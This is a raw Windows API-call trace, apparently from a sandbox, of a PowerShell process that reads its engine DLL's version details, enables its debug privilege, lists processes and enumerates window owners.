	[0598.894] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0598.895] GetVersionExW (in: lpVersionInformation=0x18da70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18da70*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0598.895] SetErrorMode (uMode=0x1) returned 0x1
	[0598.896] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x18dbd0 | out: lpFileInformation=0x18dbd0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0598.897] SetErrorMode (uMode=0x1) returned 0x1
	[0598.901] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x18de40 | out: lpdwHandle=0x18de40) returned 0x94c
	[0598.904] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c572a0 | out: lpData=0x2c572a0) returned 1
	[0598.906] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18ddb8, puLen=0x18ddb0 | out: lplpBuffer=0x18ddb8*=0x2c5733c, puLen=0x18ddb0) returned 1
	[0598.909] lstrlenW (lpString="䅁") returned 1
	[0598.918] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c57418, puLen=0x18dd20) returned 1
	[0598.919] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0598.921] CoTaskMemAlloc (cb=0x2e) returned 0x29a900
	[0598.921] lstrcpyW (in: lpString1=0x29a900, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0598.922] CoTaskMemFree (pv=0x29a900) 
	[0598.922] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c5746c, puLen=0x18dd20) returned 1
	[0598.922] lstrlenW (lpString="System.Management.Automation") returned 28
	[0598.922] CoTaskMemAlloc (cb=0x3c) returned 0x1d9e80
	[0598.922] lstrcpyW (in: lpString1=0x1d9e80, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0598.922] CoTaskMemFree (pv=0x1d9e80) 
	[0598.922] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c574c8, puLen=0x18dd20) returned 1
	[0598.922] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.922] CoTaskMemAlloc (cb=0x20) returned 0x29aea0
	[0598.922] lstrcpyW (in: lpString1=0x29aea0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.922] CoTaskMemFree (pv=0x29aea0) 
	[0598.922] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c57508, puLen=0x18dd20) returned 1
	[0598.922] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.923] CoTaskMemAlloc (cb=0x44) returned 0x1d9e80
	[0598.923] lstrcpyW (in: lpString1=0x1d9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.923] CoTaskMemFree (pv=0x1d9e80) 
	[0598.923] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c57570, puLen=0x18dd20) returned 1
	[0598.923] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0598.923] CoTaskMemAlloc (cb=0x76) returned 0x243390
	[0598.923] lstrcpyW (in: lpString1=0x243390, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0598.923] CoTaskMemFree (pv=0x243390) 
	[0598.923] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c5760c, puLen=0x18dd20) returned 1
	[0598.923] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0598.923] CoTaskMemAlloc (cb=0x44) returned 0x1d9e80
	[0598.923] lstrcpyW (in: lpString1=0x1d9e80, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0598.923] CoTaskMemFree (pv=0x1d9e80) 
	[0598.923] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c57670, puLen=0x18dd20) returned 1
	[0598.923] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0598.923] CoTaskMemAlloc (cb=0x58) returned 0x1f5570
	[0598.923] lstrcpyW (in: lpString1=0x1f5570, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0598.923] CoTaskMemFree (pv=0x1f5570) 
	[0598.923] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c576ec, puLen=0x18dd20) returned 1
	[0598.924] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0598.924] CoTaskMemAlloc (cb=0x20) returned 0x29aea0
	[0598.924] lstrcpyW (in: lpString1=0x29aea0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0598.924] CoTaskMemFree (pv=0x29aea0) 
	[0598.924] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x2c57394, puLen=0x18dd20) returned 1
	[0598.924] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0598.924] CoTaskMemAlloc (cb=0x66) returned 0x21c220
	[0598.924] lstrcpyW (in: lpString1=0x21c220, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0598.924] CoTaskMemFree (pv=0x21c220) 
	[0598.924] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x0, puLen=0x18dd20) returned 0
	[0598.924] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x0, puLen=0x18dd20) returned 0
	[0598.924] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18dd28, puLen=0x18dd20 | out: lplpBuffer=0x18dd28*=0x0, puLen=0x18dd20) returned 0
	[0598.924] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18dcf8, puLen=0x18dcf0 | out: lplpBuffer=0x18dcf8*=0x2c5733c, puLen=0x18dcf0) returned 1
	[0598.925] CoTaskMemAlloc (cb=0x204) returned 0x239e30
	[0598.925] VerLanguageNameW (in: wLang=0x0, szLang=0x239e30, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0600.199] CoTaskMemFree (pv=0x239e30) 
	[0600.199] VerQueryValueW (in: pBlock=0x2c572a0, lpSubBlock="\\", lplpBuffer=0x18dd48, puLen=0x18dd40 | out: lplpBuffer=0x18dd48*=0x2c572c8, puLen=0x18dd40) returned 1
	[0600.207] GetCurrentProcessId () returned 0xf2c
	[0600.228] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18cc70 | out: lpLuid=0x18cc70*(LowPart=0x14, HighPart=0)) returned 1
	[0601.868] GetCurrentProcess () returned 0xffffffffffffffff
	[0601.869] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18cc90 | out: TokenHandle=0x18cc90*=0x2f4) returned 1
	[0601.870] AdjustTokenPrivileges (in: TokenHandle=0x2f4, DisableAllPrivileges=0, NewState=0x2c5ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0601.871] CloseHandle (hObject=0x2f4) returned 1
	[0601.875] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xf2c) returned 0x2f4
	[0601.885] EnumProcessModules (in: hProcess=0x2f4, lphModule=0x2c5ab80, cb=0x200, lpcbNeeded=0x18dca8 | out: lphModule=0x2c5ab80, lpcbNeeded=0x18dca8) returned 1
	[0601.887] GetModuleInformation (in: hProcess=0x2f4, hModule=0x13f370000, lpmodinfo=0x2c5adf0, cb=0x18 | out: lpmodinfo=0x2c5adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0601.888] CoTaskMemAlloc (cb=0x804) returned 0x2a20d0
	[0601.888] GetModuleBaseNameW (in: hProcess=0x2f4, hModule=0x13f370000, lpBaseName=0x2a20d0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0601.889] CoTaskMemFree (pv=0x2a20d0) 
	[0601.889] CoTaskMemAlloc (cb=0x804) returned 0x2a20d0
	[0601.889] GetModuleFileNameExW (in: hProcess=0x2f4, hModule=0x13f370000, lpFilename=0x2a20d0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0601.890] CoTaskMemFree (pv=0x2a20d0) 
	[0601.890] CloseHandle (hObject=0x2f4) returned 1
	[0601.899] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xf2c) returned 0x2f4
	[0601.900] GetExitCodeProcess (in: hProcess=0x2f4, lpExitCode=0x18ddd8 | out: lpExitCode=0x18ddd8*=0x103) returned 1
	[0603.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c5b088, Length=0x20000, ResultLength=0x18dda0 | out: SystemInformation=0x12c5b088, ResultLength=0x18dda0*=0x35f00) returned 0xc0000004
	[0603.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c7b0b8, Length=0x38700, ResultLength=0x18dda0 | out: SystemInformation=0x12c7b0b8, ResultLength=0x18dda0*=0x35f00) returned 0x0
	[0603.288] EnumWindows (lpEnumFunc=0x29166ac, lParam=0x0) returned 1
	[0608.712] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0609.267] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x558
	[0609.270] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0609.276] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0610.713] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0610.716] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x538
	[0610.718] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0610.720] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x778
	[0611.475] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x778
	[0611.575] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0612.617] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0612.852] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0612.854] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0612.856] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0618.606] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0618.613] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0618.615] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0619.902] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x460
	[0619.906] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0619.909] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x4d0
	[0619.912] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x3a8
	[0619.914] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1bd0
	[0619.915] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1bfc
	[0619.917] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1a78
	[0621.432] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b90
	[0621.437] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b04
	[0622.373] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b34
	[0622.790] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1b64
	[0622.795] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1bb0
	[0622.798] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1acc
	[0624.671] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1a2c
	[0624.681] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x19a8
	[0624.685] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1944
	[0624.688] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x18c8
	[0624.691] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x18ac
	[0624.693] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x18ec
	[0624.695] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1898
	[0624.697] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc98
	[0624.697] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x153c
	[0625.635] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1808
	[0625.640] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x12a4
	[0626.927] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1740
	[0626.932] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16c4
	[0626.937] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1820
	[0626.942] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16ac
	[0628.515] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1858
	[0629.711] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1664
	[0629.717] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10b4
	[0629.722] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10ac
	[0629.725] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10ec
	[0629.728] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1068
	[0629.734] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x17e0
	[0629.735] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x102c
	[0629.736] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x17a4
	[0632.010] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1050
	[0632.010] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1694
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1770
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1720
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x165c
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1578
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x16c0
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x161c
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1638
	[0632.011] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x15c8
	[0632.012] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1554
	[0632.012] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1674
	[0632.012] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1520
	[0632.012] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x14bc
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xf8c
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe9c
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1434
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x14ec
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xfcc
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x12ac
	[0632.015] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1484
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x934
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc0c
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xb08
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x948
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1178
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x13e0
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xcd0
	[0632.016] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x13fc
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xdc8
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc18
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xc2c
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xa1c
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1244
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xdb0
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1398
	[0632.017] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1358
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1370
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1340
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x130c
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x12c0
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x12e4
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1270
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1298
	[0632.018] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x120c
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x122c
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x11c4
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x11b0
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1188
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1148
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x1160
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x10fc
	[0632.019] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe34
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xea4
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0x514
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xe48
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xbc8
	[0632.020] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x18db00 | out: lpdwProcessId=0x18db00) returned 0xdf8
